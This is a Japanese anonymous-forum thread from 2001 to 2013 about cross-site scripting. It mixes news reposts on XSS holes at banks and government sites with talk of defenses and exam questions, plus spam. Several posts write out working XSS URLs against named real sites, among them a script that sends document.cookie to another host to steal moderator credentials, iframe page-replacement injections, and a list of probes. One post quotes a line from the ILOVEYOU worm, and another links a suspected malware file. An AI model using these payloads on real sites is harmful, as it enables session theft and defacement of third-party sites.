クロスサイトスクリプティング
1 :名無しさん@お腹いっぱい。 :01/10/27 14:33.net http://securit.etl.go.jp/research/paper/css2001-takagi-dist.pdf 案外対策取られてないものですね。 クライアントサイドからもサーバサイドからも両面で対策しないと まずいですね。 皆さんはどんな対策とってますか?
2 :名無しさん@お腹いっぱい。 :01/10/27 14:37.net WebProg板にも同じようなスレが立ったんですが、 どうしましょう?
3 :名無しさん@お腹いっぱい。 :01/10/27 19:49.net WebProg板でやる?
4 :名無しさん@お腹いっぱい。 :01/10/27 19:52.net でもクライアント側の話はこっちじゃないかな? ところで、「セキュリティホール memo ML」のアーカイブに 問題があるって本当?
5 :名無し :01/10/27 22:46.net ここのArticle 1756 みてみればわかる。 http://memo.st.ryukoku.ac.jp/archive/200110.month/index.html
6 :名無しさん@お腹いっぱい。 :01/10/28 03:14.net >>5 ほんとだ。こりゃまずいわ。しかも高木さんの投稿、10月26日 じゃん
7 :エスケープ無しさん :01/10/28 05:39.net http://galaxy.rwcp.or.jp/ ここは本文からしてだめだね。 引用の記号見るだけでエスケープされてないのが分かる。
8 :名無しさん@お腹いっぱい。 :01/11/01 06:00.net 1のPDFに書いてあったけど、 これって。。。。 http://pc.2ch.net/../<S>test</S> APACHEが古いの?
9 :名無しさん@お腹いっぱい。 :01/11/02 22:31.net 最悪の場合トリップやキャップが漏れるね。 夜勤さんに報告したほうがいいのかな?
10 :名無しさん@お腹いっぱい。 :01/11/03 06:18.net こんな感じでどこにでも吹っ飛ばせる。 http://pc.2ch.net/../<SCRIPT>{location.href='http://www.2ch.net/?'+document.cookie}</SCRIPT>
11 :名無しさん@お腹いっぱい。 :01/11/03 22:41.net http://pc.2ch.net/../%3CSCRIPT%3E{location.href=%27http://www.2ch.net/?%27+document.cookie}%3C/SCRIPT%3E
12 :11 :01/11/03 22:44.net エスケープするとエラー画面上でもエスケープされるから 問題ないのか でもlocationとかで転送するという手はありそうだなあ。 で、転送URLを貼ったカキコを「エロ画像です。削除してください」 とか言って削除依頼すれば削除人のキャップを抜き放題(w
13 :名無しさん@お腹いっぱい。 :01/11/10 11:24.net まだなおってない (`皿′)ノ age
14 :>11 :01/11/10 13:32.net http://pc.2ch.net/../%3CSCRIPT%3E{location.href=%27http://www.2ch.net/?%27+document.cookie}%3C/SCRIPT%3E を開くと、 ページが見つかりません HTTP 400 - 不正な要求 Internet Explorer となる。
15 :名無しさん@お腹いっぱい。 :01/11/12 07:25.net >>14 ネスケでやってみれ. IEなら,インターネットオプションの詳細設定のブラウズの, HTTPエラーメッセージを簡易表示するのチェックを外してみれ.
16 :>15 :01/11/12 15:38.net 簡易表示するのチェックを外してみたところ、 Bad Request Your browser sent a request that this server could not understand. Invalid URI in request GET /../%3CSCRIPT%3E{location.href=%27http://www.2ch.net/?%27+document.cookie}%3C/SCRIPT%3E HTTP/1.1 となった。ネスケでは後日やってみます。 IEは5.01SP2です。
17 :cookieが表示されない :01/11/12 16:35.net セキュリティホール memo http://www.st.ryukoku.ac.jp/~kjm/security/memo/ の MS01-055: Cookie Data in IE Can Be Exposed or Altered Through Script Injection (セキュリティアンテナ, 2001.11.09)にあるデモ http://www.solutions.fi/index.cgi/extra_iebug?lang=eng でamazon.co.jpを読むと(事前にamazon.co.jpのcookieを取り込んである) MSIE cookie vulnerability test page This page displays the cookies found on your browser for site amazon.co.jp: Cookies: No cookies found for site... Click here to make new search for cookies. −−−−− アクティブスクリプトに対して「プロンプトを表示」で表示されたら はい(Y)を選択する。 こんなダイアログ−http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/ie6-script-dialog.png −−−−− アクティブスクリプトを実行しなければ "; document.location=url; と表示される。 −−−−− デモが表示された後、「戻る」と 警告: ページの有効期限切れ 要求したページは、フォームで送信された情報を使用して作成されました。このページは、もう利用できません。セキュリティ保護のため、情報は自動的には再送信されません。 情報を再送信し、この Web ページを表示するには、ツール バーの [更新] ボタンをクリックしてください。 となる。
18 :名無しさん@お腹いっぱい。 :01/11/12 19:30.net >>16 ここで試してみれ。 http://slashdot.jp/comments.pl?sid=01/11/09/0844243&cid=30
19 :>18 :01/11/12 23:36.net http://pc.2ch.net/../<SCRIPT>alert('hello')</SCRIPT> Bad Request Your browser sent a request that this server could not understand. Invalid URI in request GET /../%3CSCRIPT%3Ealert('hello')%3C/SCRIPT%3E HTTP/1.0 −−−−− HTTP/1.0となっている。 16は1.1だが。
20 :名無しさん@お腹いっぱい。 :01/11/13 05:52.net >>14 11では抜けないことは確認済み。
21 :名無しさん@お腹いっぱい。 :01/11/13 06:25.net BBS_UNICODE=passな板なら数値文字参照を使って クリック一発なURLを生成できた 「HTTPエラーメッセージの簡易表示」対策はしてないけど http://teri.2ch.net/test/read.cgi/accuse/1005368156/110
22 :名無しさん@お腹いっぱい。 :02/02/04 21:48.net バカボンド age!
23 :名無しさん@お腹いっぱい。 :02/03/22 12:00.net http://ime.nu/<script>alert('hogehoge')</script>
24 :名無しさん@お腹いっぱい。 :02/03/22 12:02.net http://ime.nu/%3Cscript%3Ealert%28'hogehoge'%29%3C/script%3E
25 :名無しさん@お腹いっぱい。 :02/03/22 12:03.net http://ime.nu/%3Cscript%3Ealert%28%27hogehoge%27%29%3C/script%3E
26 :名無しさん@お腹いっぱい。 :02/03/23 23:20.net http://example.com/<test
27 :名無しさん@お腹いっぱい。 :02/03/23 23:22.net http://example.com/>test
28 :名無しさん@お腹いっぱい。 :02/04/08 22:04.net アゲとくか
29 :名無しさん@お腹いっぱい。 :02/04/09 21:34.net officeのタカリネタ
30 :名無しさん@お腹いっぱい。 :02/04/10 05:15.net CSSのスレは前からあったんだね。できれば荒らされないようにsage進行キボン。 当面、銀行スレからコピペで情報もってくるかな。
31 :名無しさん@お腹いっぱい。 :02/04/11 03:05.net クロスサイトスクリプティング脆弱性レポートページが登場(2002.3.9) クロスサイトスクリプティング脆弱性に関する啓蒙活動を行っている office 氏が、これまでに発見したクロス サイトスクリプティングのうち代表的なものを紹介するページを公開した。 このページには、マイクロソフト、楽天、ジャパンネットバンク銀行などンなど大手企業のクロスサイトスクリプ ティング脆弱性が報告されている。 Cross Site Scripting Holes http://www.office.ac/holes.html (詳しくはScan および Scan Daily EXpress 本誌をご覧ください) http://shop.vagabond.co.jp/m-ssw01.shtml http://shop.vagabond.co.jp/m-sdx01.shtml https://www.netsecurity.ne.jp/article/1/4278.html
32 :名無しさん@お腹いっぱい。 :02/04/11 03:10.net みずほ銀行のWebサイトにクロスサイトスクリプティングの脆弱性 4月1日より開業したみずほ銀行だが、相次ぐトラブルの中、あらたに同行のWebサイトに クロスサイトスクリプティングの脆弱性が発見された。 この問題は、クロスサイトスクリプティング問題の調査と啓蒙を行っているoffice 氏が発見 したもので、同行のインターネットバンキングサービスのログイン画面などに脆弱性が存在 している。この脆弱性を利用することにより、偽装した画面を表示すること可能で、顧客番号 や口座番号、暗証番号をリダイレクトさせることもできるなど、非常に危険な状態である。 同行は合併に伴うシステムの移行が遅れ、挙げ句の果てにATMという基本的なシステム が使えないと言う大失態を犯してしまうなど、トラブルが多発している。今回のクロスサイト スクリプティングの脆弱性も、十分な検証が行われないままスタートした同行の慌てぶりを 象徴する事件であるといえよう。 大手銀行の合併が相次いだが、きわめてクリティカルな状況におかれる銀行においては、 システムの十分な検証が何よりも重要な事項である。確かに開業日までにシステムが完成 していることは重要である。しかし、利用者が安心して使用できるシステムを作り上げること こそが、本当に大切なことであることを、システム担当者には今一度思い出して頂きたい。 http://headlines.yahoo.co.jp/hl?a=20020403-00000010-vgb-sci
33 :名無しさん@お腹いっぱい。 :02/04/15 22:55.net ちゃんねる検索を2ちゃんねる化 http://2ch.dyn.to/cgi-bin/namazu.cgi?idxname=../<SCRIPT%20DEFER>document.body.innerHTML='<html><head><title>2%82%BF%82%E1%82%F1%82%CB%82%E9%82%D6%82%E6%82%A4%82%B1%82%BB</title> </head><body><iframe%20src%3Dhttp://www.2ch.net/%20frameborder%3Dno%20border%3D0%20width%3D100%25%20height%3D100%25%20marginwidth%3D0%20marginheight%3D0></iframe></body></html>';</script> 一行につなげて打ち込んで
34 :名無しさん@お腹いっぱい。 :02/04/15 23:21.net 東京大学が2ちゃんねる (1行につなげてね) http://www.utnl.gen.u-tokyo.ac.jp/cgi-bin/namazu.cgi?idxname=../<SCRIPT%20DEFER>document.body.innerHTML='<html><head> <title>2%82%BF%82%E1%82%F1%82%CB%82%E9%82%D6%82%E6%82%A4%82%B1%82%BB</title></head><body><iframe%20src%3Dhttp://www.2ch.net/ %20frameborder%3Dno%20border%3D0%20width%3D100%25%20height%3D100%25%20marginwidth%3D0%20marginheight%3D0></iframe></body></html>';</script>
35 :名無しさん@お腹いっぱい。 :02/04/15 23:24.net http://sv2.humeco.m.u-tokyo.ac.jp/cgi-bin/namazu.cgi?idxname=../<SCRIPT%20DEFER>document.body.innerHTML='<html> <head><title>2%82%BF%82%E1%82%F1%82%CB%82%E9%82%D6%82%E6%82%A4%82%B1%82%BB</title></head><body><iframe%20src%3D http://www.2ch.net/%20frameborder%3Dno%20border%3D0%20width%3D100%25%20height%3D100%25%20marginwidth%3D0%20marginheight%3D0></iframe></body></html>';</script>
36 :名無しさん@お腹いっぱい。 :02/04/15 23:28.net タイトルは body.innderHTML= じゃ変わらないね。 document.title= でどうよ。
37 :名無しさん@お腹いっぱい。 :02/05/04 06:00.net UFJ銀行のサーバーにクロスサイトスクリプティングの脆弱性(2002.1.17) https://www.netsecurity.ne.jp/article/1/3737.html 首相官邸のホームページにクロスサイトスクリプティングの脆弱性(2002.3.13) https://www.netsecurity.ne.jp/article/1/4313.html 首相官邸にクロスサイトスクリプティング問題 任意のメッセージを表示可能(2002.3.14) https://www.netsecurity.ne.jp/article/1/4337.html 警察庁、外務省、公安委員会のWebサイトにクロスサイトスクリプティング(2002.3.19) https://www.netsecurity.ne.jp/article/1/4403.html みずほ銀行のWebサイトにクロスサイトスクリプティングの脆弱性(2002.4.3) https://www.netsecurity.ne.jp/article/1/4636.html 【Webサーバに起因するクロスサイトスクリプティング脆弱性(1)】(執筆:office)(2002.4.25) https://www.netsecurity.ne.jp/article/3/4924.html
38 :名無しさん@お腹いっぱい。 :02/05/04 06:35.net NetscapeとMozillaにローカルファイルが読み出せるセキュリティホール(2002.5.2) Netscape6.1以上とMozilla0.9.7以上のバージョンに、ローカルファイルが閲覧出来るという問題が 発見された。この問題は、XMLHTTPコンポーネントに存在するセキュリティホールを利用することで、 リモートからローカルファイル転送出来るという物。 このセキュリティホールを発見したのは、イスラエルのGreyMagic Softwareで、同社は昨年の12月 にInternet Explorerでも同様の問題を発見している。マイクロソフトでは、この問題に対するパッチを 提供済みだ。 GreyMagic社によると、この問題をNetscapeに通達しているが、Netscapeからの連絡は現在の所 無いという。なお、Netscapeでは、危険性の高いバグを発見した物に対し1,000ドルを支払うという 「Bug Bounty Program」を実施しているものの、この件に対し何の返事もないことに、GreyMagic社 はNetscapeの対応の悪さを糾弾している。 https://www.netsecurity.ne.jp/article/1/5021.html
39 :ヤプーニュース Scanの報道を握り潰し か? :02/05/13 18:07.net https://www.netsecurity.ne.jp/article/1/5129.html クロスサイトスクリプティング攻撃がYahoo!オークションに仕掛けられる(2002.5.13) この記事が Yahoo!ニュースに未だ掲載されず。 http://headlines.yahoo.co.jp/hl?c=sci&t=l
40 :名無しさん@お腹いっぱい。 :02/05/13 18:12.net >>39 ソフトバンク系の会社はいかがわしいので公正を期待してはいけない(w ZDNet(ソフトバンクの子会社)もいつもソフトバンクの都合悪いことは 報道しないでしょ。
41 :名無しさん@お腹いっぱい。 :02/05/13 18:40.net 今回はYahoo工作員になってやろう。 こんなのクロスサイトスクリプティングじゃねーだろ。 オヒイスが無知を糊塗するために広義のクロスサイトスクリプティングなどとごまかしたもんだから墓穴を掘ることになった。 ユーザが外部からスクリプト持ち込めるホストは全部脆弱性があるとでも言うつもりだろうか? めでてーな。ゲラゲラ
42 :名無しさん@お腹いっぱい。 :02/05/13 18:50.net http://www.geocities.jp/yamasan_gogo/index.htm
43 :名無しさん@お腹いっぱい。 :02/05/13 18:58.net >>41 Yahoo Auction は、クッキー盗まれたらヤバイだろ。 証明して欲しいのか?>工作員
44 :名無しさん@お腹いっぱい。 :02/05/13 19:44.net まさかクッキー値だけで認証してるとでも。 ゲラゲラ Yahoo Japanはへっぽこだが本家Yahoo Inc.はそのくらいの技術力は持ってるぞ。 クッキーは同一IPアドレスに対して有効。(その他も見てるかも)
45 :名無しさん@お腹いっぱい。 :02/05/13 21:39.net 44 が本物の工作員なら困ったことだな。 同一IPのチェックしてれば問題ないとでも? ケーブル民はどうなってもいいのか。 つーか、同一IPチェックしてたら企業ユーザが使えなくなる。
46 :名無しさん@お腹いっぱい。 :02/05/13 21:40.net ttp://www.pos.to/%3C%73C%72%69%70%74%3E%61%6C%65%72%74%28%22%82%DC%82%BD%E9%78%82%B3%82%EA%82%BD%82%F1%82%BE%82%CB%28%CC%DF%22%29%3C%2F%73C%72%69%70%74%3E
47 :名無しさん@お腹いっぱい。 :02/05/13 22:11.net >>45 それだけやっても抜けるのは登録メアド、登録してあれば名前,住所等個人情報(登録はオプション)。 自己紹介と登録メアドは悪戯できるな。
48 :名無しさん@お腹いっぱい。 :02/05/13 22:27.net 他人の垢で入札したり、他人の入札をキャンセルしたりできるんでねーの?
49 :名無しさん@お腹いっぱい。 :02/05/13 22:29.net 入札のときはパスワードいるだろ。キャンセルはわからん。
50 :michimi :02/05/26 10:42.net [The Cross Site Scripting FAQ] http://slashdot.jp/article.pl?sid=02/05/22/1134226
51 :名無しさん@お腹いっぱい。 :02/05/27 00:46.net メールアドレスを変更して、そのアドレスにパスワード送らせることができる。 ただし、母親の旧姓だの、ペットの名前だのが必要になるが。
52 :名無しさん@お腹いっぱい。 :02/06/03 14:50.net 「旅の窓口」mytrip.net にクロスサイトスクリプティング脆弱性(2002.6.3) 宿泊情報・観光情報、予約サービスを提供する「旅の窓口」mytrip.net にクロス サイトスクリプティング脆弱性が発見された。 この問題により、Cookie情報の取得や悪意のあるページを作成することが可能に なっていた。しかし、幸いなことに同サイトではCookie情報を利用していたが、現在 Cookieだけで認証は行っていないため、悪用される危険性は無かったようだ。 同サイトでは、クロスサイトスクリプティングに対する脆弱性を修正するとともに、 「 < 」「 > 」などといった特殊文字を、予約情報や掲示板などのサイト内で入力可 能な項目に使用することを禁止している。現在、これらの文字を含んだ項目を入力 しようとした場合には、警告を表示し入力を受け付けないよう、修正が施されている。 「旅の窓口」クロスサイト・スクリプティングの脆弱性について http://www.mytrip.net/aboutcss.html https://www.netsecurity.ne.jp/article/1/5388.html
53 :名無しさん@お腹いっぱい。 :02/06/03 15:43.net >>52 旅窓は認証自体ヤバイだろ メアドと電話番号だぞ
54 :名無しさん@お腹いっぱい。 :02/06/10 20:54.net なんかね、以前書いた CGI スクリプト見たん です。そしたら、text/plain でエラーメッセー ジ出してるじゃないですか。しかもユーザ入 力そのまま入ってるし。text/html じゃない から平気だと思ってたんだけど。 IE だとヤヴァイらしいから、書き換えますね。 ヤレヤレ…
55 :名無しさん@お腹いっぱい。 :02/06/12 10:50.net ローカル HTML リソースに存在するクロスサイト スクリプティングの脆弱性。 カスケード スタイル シートのサポートを提供する HTML オブジェクトの使用に関連する情報の漏えいの脆弱性。 Cookie 内のスクリプト処理に関連する情報の漏えいの脆弱性。 ゾーン偽装の脆弱性。 マイクロソフト セキュリティ情報 MS01-058 で説明されている 「Content-Disposition」 の脆弱性の 2 つの変種。 概要 : このセキュリティ情報の対象となるユーザー : MicrosoftR Internet Explorer を使用しているお客様 脆弱性の影響 : 6 つの新しい脆弱性。最も深刻な脆弱性については、攻撃者の選択したコードが 実行される可能性があります。 最大深刻度 : 高 推奨する対応策 : Internet Explorer の影響を受けるバージョンを使用しているお客様は直ちに この修正プログラムをインストールして下さい。 影響を受けるソフトウェア : Microsoft Internet Explorer 5.01 Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 6 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム (Q321232) (MS02-023) http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023.asp
56 :スミルノフ :02/06/27 22:44.net Vulnerabilities on Major Websites http://webmail.linux-tech.com/pipermail/infosec/2002-March/000070.html によれば http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=<script>alert( "Point+Blank+Security");</script> がCSSだそうだが、これは現在のところ修正したのかな?効かない。 だけれど http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=javascript:alert('Point+Blank+Security') 同じく http://www.fbi.gov/cgi-bin/outside.cgi?<script>alert( "Point+Blank+Security");</script> がCSSだそうだが、これは現在のところ修正したのかな?効かない。 だけれど http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert('Point+Blank+Security') なんちゅうか、sage.
57 :スミルノフ :02/06/27 22:52.net http://search.linuxsecurity.com/cgi-bin/htsearch?words='></title><script>alert( "---")</script>
58 :スミルノフ :02/07/20 18:11.net http://search.linuxsecurity.com/cgi-bin/htsearch?words='></title><script>alert( "---")</script> は修正されたみたい。
59 :age :02/08/20 21:46.net age
60 :名無しさん@お腹いっぱい。 :02/08/20 21:51.net 某NHKのことかな?
61 :名無しさん@お腹いっぱい。 :02/08/20 23:54.net 某って言うな某って! 棒なら僕の菊穴に入ってるよ、太いやつが・・(ハアハア・・
62 :スンスン&rlo;♪ン〜ス&lre; :02/08/21 02:47.net Googleの「巨人 村田」バグの謎は解けたんでしょうか?
63 :名無しさん@お腹いっぱい。 :02/09/03 19:12.net あげ
64 :砂漠の秘密都市 :02/09/08 16:18.net IEを使って次の問いに答えよ。 設問:次の二つのURLでの挙動の違いとは何か? ttp://sunsolve.sun.com/<p/style=background-image:url(javascript:document.URL=document.URL)> ttp://sunsolve.sun.com/<script>document.URL=document.URL;</script>
65 :age :02/10/18 21:09.net age
66 :名無しさん@お腹いっぱい。 :02/10/24 02:49.net >>64 は何?
67 :名無しさん@お腹いっぱい。 :02/10/26 16:36.net とっても便利 どこからでもメールが送れる http://www2u.biglobe.ne.jp/~ira/mail.cgi
68 :名無しさん@お腹いっぱい。 :02/10/26 16:40.net 訂正 http://www2u.biglobe.ne.jp/~ira/
69 :名無しさん@お腹いっぱい。 :02/10/26 16:42.net 訂正 http://www2u.biglobe.ne.jp/~ira/mail.log
70 :名無しさん@お腹いっぱい。 :02/10/27 01:56.net >>67 スレとの関係がわからんが、怖くて使えんよ。
71 :名無しさん@お腹いっぱい。 :02/10/27 14:26.net >>70 単なるメアド収集なので通報しておきました
72 :名無しさん@お腹いっぱい。 :02/10/27 20:02.net >>71 どこに?
73 :名無しさん@お腹いっぱい。 :02/10/28 00:29.net 通報しますたにマジレスする香具師がいるとは思わなんだ
74 :名無しさん@お腹いっぱい。 :02/11/18 02:33.net [memo:4996] 愛知県避難所支援システムの XSS 脆弱性
75 :age :03/01/04 20:20.net age
76 :山崎渉 :03/01/15 15:47.net (^^)
77 :age :03/03/19 10:39.net age
78 :(´-ω-`) :03/03/19 10:47.net 見てみ http://homepage3.nifty.com/digikei/
79 :(´-ω-`) :03/03/19 16:02.net >>78 見たよ〜
80 :山崎渉 :03/04/17 12:18.net (^^)
81 :山崎渉 :03/04/20 06:15.net ∧_∧ ( ^^ )< ぬるぽ(^^)
82 :山崎渉 :03/05/22 02:19.net ━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
83 :山崎 渉 :03/07/15 11:19.net __∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄
84 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:02.net ∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ
85 :山崎 渉 :03/08/15 23:24.net (⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
86 :名無しさん@お腹いっぱい。 :03/10/03 21:19.net 今でもCSSなんて残ってるの?
87 :名無しさん@お腹いっぱい。 :03/10/03 21:24.net だから古いスレ上げるなバカ
88 :名無しさん@お腹いっぱい。 :03/10/03 22:59.net >>87 話題が無いなら黙ってれば?
89 :88 :03/10/03 23:09.net 私はsageもできないバカです。
90 :名無しさん@お腹いっぱい。 :03/10/03 23:11.net >>88 低脳は黙ってろクズ
91 :名無しさん@お腹いっぱい。 :03/10/04 00:33.net 馬鹿どもを晒しage
92 :名無しさん@お腹いっぱい。 :03/10/18 13:04.net >>86 http://www.crowechizek.com/CC/Global+Navigation/Services/r05_ovr.htm?Serv= "><s>
93 :名無しさん@お腹いっぱい。 :03/10/19 18:40.net 今日の情報セキュリティ試験でXSSが出て来た…
94 :名無しさん@お腹いっぱい。 :03/10/19 22:37.net >>93 Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に [ b ]が存在した場合には,それらに対するエスケープ処理をWebサーバが 実施しなければならないといったことがあります。 bに相当するのは普通「スクリプト」だと思うんだが、解答群に無かったよな。
95 :名無しさん@お腹いっぱい。 :03/10/19 23:44.net >>94 メタキャラクタでいいんじゃない? 要は不等号をタグとして扱わなければいい訳だし。
96 :95 :03/10/20 07:16.net >>95 うん。漏れもメタキャラクタにしたんだけどXSS対策に限定すると 何か回答としてはイマイチだなぁと。
97 :名無しさん@お腹いっぱい。 :03/10/27 21:29.net 総務省お抱えのcrowechizekはFlash,HTML両バージョンともダメダメ。 Flashでは応答返ってこないし、HTMLでは文字大きくなるし。 "<H1>No medicine can cure a fool</H1>
98 :名無しさん@お腹いっぱい。 :03/10/28 22:43.net ↑IIS?
99 :名無しさん@お腹いっぱい。 :03/10/30 10:56.net > Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に リクエストに対して返すコンテンツ中のメタキャラクタを全部エスケープしち まったら、HTMLが全部ソースで見えちまうだろ。大丈夫か、その試験。
100 :名無しさん@お腹いっぱい。 :03/10/30 11:00.net >>94 スクリプト を エスケープする とは言わない。 エスケープする対象として日本語的に適切な選択肢を選べば回答できる。 他にはどんな選択肢があったの?
101 :名無しさん@お腹いっぱい。 :04/01/07 12:29.net 最近話題にもならなくなったな
102 :名無しさん@お腹いっぱい。 :04/02/04 00:16.net クッキーで個人情報を保存するのはどう? ↓使ってみようかと思ってますが大丈夫でしょうか ttp://resume.meieki.com/
103 :名無しさん@お腹いっぱい。 :04/02/04 00:32.net URLにスクリプト仕込むのはTHEBBSの人たちが既にやってる http://hack.dot.thebbs.jp/1068805016.html JavascriptをいったんString.fromCharCode化してしまえば 全タグ有効っつーかなんでもできるらしい
104 :名無しさん@お腹いっぱい。 :04/04/11 21:36.net ぱおぱおクッキー
105 :名無しさん@お腹いっぱい。 :04/04/11 23:30.net 2chにもクロスサイトスクリプティング脆弱性は結構あるよ。
106 :名無しさん@お腹いっぱい。 :04/04/12 08:53.net 言うだけなら誰でも出来る罠
107 :名無しさん@お腹いっぱい。 :04/04/12 11:29.net >>106 実際にやるとどこかのおバカさんみたいに ムショに連行される罠w
108 :名無しさん@お腹いっぱい。 :04/04/12 13:29.net と言い訳をして具体例も挙げられない馬鹿もいるようで。
109 :名無しさん@お腹いっぱい。 :04/05/09 23:56.net >>107 俺はハッカーだから鯖落としたりできるぜ! でも捕まるからやらない ってな。捕まらないようにできない奴は単なる厨房 足跡ベタベタ残してならF5押してる馬鹿と同じ
110 :名無しさん@お腹いっぱい。 :04/08/08 21:34.net 最近落ち着いた?
111 :名無しさん@お腹いっぱい。 :04/09/16 16:51:06.net みたいだね
112 :名無しさん@お腹いっぱい。 :04/10/18 10:27:10.net 懐かしいね
113 :名無しさん@お腹いっぱい。 :04/11/19 17:45:06.net 想定される被害で考えたらXSSは「だからなに?」って程度のもんだよ。 Phishingに使われちゃうとかだろうな、今だと。 あとあれか、「XSSほっといてるってコトは他にも穴がバンバンあるだろうーな」 「この会社はセキュリティ対策してねーな」って思われちゃう位だろうか。
114 :名無しさん@お腹いっぱい。 :05/01/02 11:52:43.net
115 :名無しさん@お腹いっぱい。 :2005/05/19(木) 16:29:50 .net 質問させてください。 クロスサイトスクリプティングに関して、概要や対策を紹介したページは多々あるんですが、 実際自分のWEBサイトが攻撃の踏み台にされたかどうかの確認する方法ってあるんでしょうか? つまりWEBサイト上に形跡が残るものかどうかということを知りたいです。
116 :名無しさん@お腹いっぱい。 :2005/07/08(金) 16:40:25 .net あっそ
117 :名無しさん@お腹いっぱい。 :2005/07/24(日) 15:08:01 .net ネクラヒッキーのみんなー 夏は出会いの季節!夏を盛り上げる為にも、ココで女の子と出会って仲良くなろう♪ http://www.pretty-love.com/de.php
118 :名無しさん@お腹いっぱい。 :2005/08/03(水) 00:00:59 .net ●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●● ウイルス対策ソフトの検出力結果 http://www.geocities.jp/stealrush/security.html ●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●
119 :名無しさん@お腹いっぱい。 :2006/06/03(土) 15:48:50 .net 先日、中国人らしいハッカーにVNCの脆弱性をりようされ PCに進入を許してしまいました。 これは、ハッカーがIEの履歴に残していったEXEなんですが http://mysky.6600.org/yx/gz.exe 偉い方、なにをするものか教えてください
120 :名無しさん@お腹いっぱい。 :2007/04/05(木) 16:35:01 .net ttp://hyocom.jp/b_search.php ここのキーワード検索は、XSSなんでしょうか?
121 :名無しさん@お腹いっぱい。 :2007/11/04(日) 11:30:26 .net ttp://www.brooks.co.jp/index.php ヤバイなこのサイト・・・
122 :名無しさん@お腹いっぱい。 :2008/06/03(火) 21:25:27 .net >>119 メール送信ワームが作成する圧縮ユーティリティ ワームが自分自身を圧縮してKellyOsbourne.com.gzという ファイルを作るためのもの。 早い話がワームがすでに実行されたことを意味するよ。
123 :名無しさん@お腹いっぱい。 :2008/06/05(木) 00:12:08 .net 2年物の自演てすごいよな
124 :名無しさん@お腹いっぱい。 :2009/04/05(日) 21:36:40 .net ttp://poke.ula.cc/pcview.cgi/%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E ttp://h.ula.cc/dance/?kenken=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E ttp://same.ula.cc/test/r.so/%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E ttp://unkar.jp/2ch/search.php?q=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E ttp://mail-cafe.tv/p/top/index2.php?c=%22%3E%3Ciframe%3E%3C/iframe%3E ttp://idol.mp3torrent.org/%22%3E%3Ciframe%20src=/%3E%3C/iframe%3E/index.html ttp://www.nikkanberita.com/search.cgi?w=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E ttp://sousuo.gov.cn/pagephoto?photopage=cn%2Fphoto.jsp&channelid=3001&searchword=YouTube&url=%22%3E%3Ciframe%3E%3C/iframe%3E ttp://sbj.saic.gov.cn/english/show.asp?id=460&bm=%27%3E%3Ciframe%3E ttp://www.stats.gov.cn/was40/reldetail.jsp?docid=%22%3E%3Ciframe%3E%3C/iframe%3E ttp://japanese.joins.com/search/japanese.php?query=kim%22%3E%3Ciframe%3E%3C/iframe%3E ttp://world.kbs.co.kr/english/news/news_Po_detail.htm?No=%22%3E%3Ciframe%3E%3C/iframe%3E ttp://joongangdaily.joins.com/search/index.html?query=%22%3E%3Ciframe%3E%3C/iframe%3E ttp://chinese.joins.com/gb/series.do?method=%22%3E%3Ciframe%3E%3C/iframe%3E ttp://chinese.joins.com/big5/article.do?method=%22%3E%3Ciframe%3E%3C/iframe%3E ttp://photo.english.chosun.com/dailyNews/view.do?category=2&gubun=ENG?gubun=daily_news_item&idx=%22%3E%3Ciframe%3E%3C/iframe%3E ttp://news.chosun.com/svc/list_in/list.html?catid=%22%3E%3Ciframe%3E%3C/iframe%3E
125 :名無しさん@お腹いっぱい。 :2009/06/12(金) 03:34:55 .net http://pc11.2ch.net/test/read.cgi/sec/1004160822/l50
126 :名無しさん@お腹いっぱい。 :2009/06/12(金) 03:35:14 .net http://pc11.2ch.net/test/read.cgi/sec/1004160822/l50
127 :名無しさん@お腹いっぱい。 :2010/09/05(日) 10:10:20 .net うーん
128 :名無しさん@お腹いっぱい。 :2011/01/10(月) 14:03:21 .net C.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.VBS")
129 : 忍法帖【Lv=40,xxxPT】(5+0:8) 【29.4m】 電脳プリオン ◆3YKmpu7JR7Ic :2013/01/09(水) 22:34:04.13 ?PLT(12079).net ∧_∧ ( ・∀・) | | ガッ と ) | | Y /ノ 人 / ) < >__Λ∩ _/し' //. V`Д´)/ ←>>81 (_フ彡 /
130 : 忍法帖【Lv=3,xxxP】(1+0:8) :2013/01/11(金) 02:49:36.70 .net test
131 :名無しさん@お腹いっぱい。 :2013/01/24(木) 21:26:51.65 .net 過疎スレがこんなところにも。
132 :名無しさん@お腹いっぱい。 :2013/02/09(土) 00:06:11.18 .net タグを使えないネトゲのマイページのプロフィール欄に 外部のブログパーツのスクリプトを引っ張ってきたいのですが、 どのようにやればいいのでしょうか。 ご教示いただけますか? ほかの人のやっているののソースを見ると、 アンカーが二重<<>>になっているだけのようなのですが それで書き込んでもはじかれてしまいます。 しらべてみて、文字コードによるハック?ということまでたどりついたのですが 実際のやり方がわかりません。 詳しい方おしえてください。よろしくお願いします。
133 :名無しさん@お腹いっぱい。 :2013/10/19(土) 22:46:39.70 .net <script>alert(1);</script> <script>alert("a");</script> >>javascript:alert(1)
134 :名無しさん@お腹いっぱい。 :2013/10/19(土) 22:47:43.23 .net >>1 javascript:alert(1)
